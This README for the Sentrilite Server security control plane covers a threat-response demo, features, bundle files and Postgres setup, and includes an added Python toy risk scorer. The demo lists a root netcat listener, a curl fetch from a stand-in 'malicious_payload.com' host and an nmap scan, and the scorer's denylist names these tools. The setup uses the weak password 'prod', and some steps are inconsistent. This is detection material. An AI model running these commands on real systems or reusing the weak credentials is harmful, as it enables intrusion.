Sentrilite Server -- Control Plane, API and UI for Sentrilite Agents.
Website: https://sentrilite.com
Contact: info@sentrilite.com
Live Demo - Active Threat Response
What This Demo Shows
- Detection of active threats during execution
- Risk scoring based on syscall + process + network behavior
- Automatic process termination for high-risk activity
This demo shows real-time detection and automatic termination of malicious activity on a live Linux system using Sentrilite.
| Color | Category | Meaning |
|---|---|---|
| Red | Critical Risk | Confirmed malicious behavior with high confidence |
| Orange | Medium Risk | Suspicious activity requiring investigation |
| Purple | Active Response | Enforcement action taken - process terminated |
The following commands were used for simulation:
sudo nc -l 5000
curl http://malicious_payload.com >/dev/null 2>&1
nmap -p 22,80,443 127.0.0.1 >/dev/null 2>&1
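The risk-scoring idea behind the demo, as an added example that is not Sentrilite's code (this README does not publish its scoring model or rule format): a toy scorer combines syscall, process and network signals from constructed events mirroring the three simulation commands above, maps the score to the colour categories in the table, and marks Critical results for termination. The weights, threshold and denylist are assumptions chosen for illustration.

```python
# Added toy scorer, not Sentrilite's code (the README does not publish its
# model): syscall + process + network signals -> score -> colour category.
import ipaddress
from dataclasses import dataclass

CRITICAL, MEDIUM, LOW = "Critical Risk", "Medium Risk", "Low Risk"
KILL_AT = 80                              # hypothetical termination threshold
RISKY_TOOLS = {"nc": 40, "nmap": 50}      # hypothetical per-tool weights
BAD_HOSTS = {"malicious_payload.com"}     # constructed denylist

@dataclass
class Event:
    pid: int
    comm: str              # process name from execve
    uid: int
    syscalls: frozenset    # syscalls observed for this process
    remote: str = ""       # remote host contacted, if any
    ports: tuple = ()      # distinct listen/destination ports seen

def is_external(host):
    """True for a DNS name or public IP; False for loopback/private/empty."""
    try:
        return ipaddress.ip_address(host).is_global
    except ValueError:
        return bool(host)

def score(ev):
    s, why = 0, []
    if ev.comm in RISKY_TOOLS:
        s += RISKY_TOOLS[ev.comm]; why.append(f"recon/tunnel tool {ev.comm}")
    if "listen" in ev.syscalls and ev.uid == 0:
        s += 30; why.append("root process opened a listening socket")
    if "connect" in ev.syscalls and is_external(ev.remote):
        s += 20; why.append(f"outbound connection to {ev.remote}")
    if ev.remote in BAD_HOSTS:
        s += 60; why.append("destination on denylist")
    if len(ev.ports) >= 3:
        s += 30; why.append(f"{len(ev.ports)} ports touched (scan pattern)")
    return s, why

def classify(ev):
    s, why = score(ev)
    cat = CRITICAL if s >= KILL_AT else MEDIUM if s >= 40 else LOW
    action = f"Active Response: terminate pid {ev.pid}" if cat == CRITICAL else "none"
    return {"pid": ev.pid, "comm": ev.comm, "score": s, "category": cat, "reasons": why, "action": action}

# Constructed events mirroring the README's three simulation commands.
DEMO = [Event(4101, "nc", 0, frozenset({"execve", "socket", "bind", "listen"}), ports=(5000,)),
        Event(4102, "curl", 1000, frozenset({"execve", "socket", "connect"}), "malicious_payload.com", (80,)),
        Event(4103, "nmap", 1000, frozenset({"execve", "socket", "connect"}), "127.0.0.1", (22, 80, 443))]
```

Calling `classify()` on each entry of `DEMO` yields Medium for the root netcat listener and Critical (with a termination action) for the denylisted download and the multi-port scan.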
Main Dashboard
PDF Report
Sentrilite Workflow Diagram
Sentrilite Server is the main control plane for Sentrilite agents. It ingests real-time telemetry from endpoints, servers and Kubernetes nodes, correlates alerts, and exposes everything through a single web dashboard and API.
Key Features
- Centralized Control Plane: Manage and monitor all Sentrilite agents from a single server across cloud, on-prem, and Kubernetes environments.
- Manage Alerts: All alerts are encrypted using TLS/SSL keys and saved to a centralized PostgreSQL database.
- Real-Time Telemetry Ingestion: High-throughput ingestion of structured process, file, and network events streamed from agents in real time.
- Unified Web Dashboard: Web UI for live event streaming, alert triage, node health, rule management, and reporting.
- Detection-as-Code & Response (DACR): Define and manage detection rules centrally using JSON. Rules are applied instantly across all connected agents -- no restarts or redeploys.
- Risk Scoring & Alerting: Events are tagged, scored, and escalated into alerts with clear context for fast triage and response.
- AI / Heuristic Insights (Optional): Generate per-node security insights using LLMs or built-in heuristics to summarize alerts and highlight suspicious behavior.
- Audit & Reporting: Export audit-ready reports (PDF / JSON / CSV) with timelines, risky activity, and per-node summaries.
- Kubernetes-Aware: Understands nodes, pods, containers, and namespaces when agents run as DaemonSets, presenting normalized data in the UI.
- Integrations: Forward alerts to existing tooling such as Prometheus Alertmanager, PagerDuty, Slack, or external SIEMs.
- Scalable & Lightweight: Designed to handle high event volumes with minimal operational overhead.
Contents of this Bundle
| File | Purpose |
|---|---|
| install_db.sh | Script to load the eBPF kernel module |
| sentrilite-serverctl.sh | Script to start/stop sentrilite-server |
| sentrilite-server | Go control-plane server that accepts alerts from agents and hosts the admin dashboard |
| ui/sentrilite.html | Main frontend UI for viewing node status, alerts, reports, etc. |
| ss.conf | Configuration file for Sentrilite Server |
| server.cnf | Configuration file for generating keys |
| license.key | Sentrilite license key file |
| LICENSE.txt | Sentrilite License Agreement |
| gen_keys.txt | Instructions to create TLS/SSL/JWT keys for authentication/authorization |
| README.md | This document |
System Requirements
- Ports: 8080 (dashboard), 9765 (WebSocket for agents)
General Requirements
- PostgreSQL database: Alerts are saved to a PostgreSQL database, which is created by the installation script.
Licensing
The project currently ships with a trial license.key.
Third-Party Integrations
- SIEMs: Can seamlessly integrate with third-party SIEM tools.
- Can push alerts to PagerDuty / Prometheus Alertmanager.
Installation Steps
- Unzip the bundle:
unzip sentrilite_server_bundle.zip
cd sentrilite-server
- Start the Postgres server and create the sentrilite database:
sudo -u sentrilite psql -d sentrilite
CREATE USER sentrilite WITH PASSWORD 'prod';
CREATE DATABASE sentrilite OWNER sentrilite;
sudo ./install_db.sh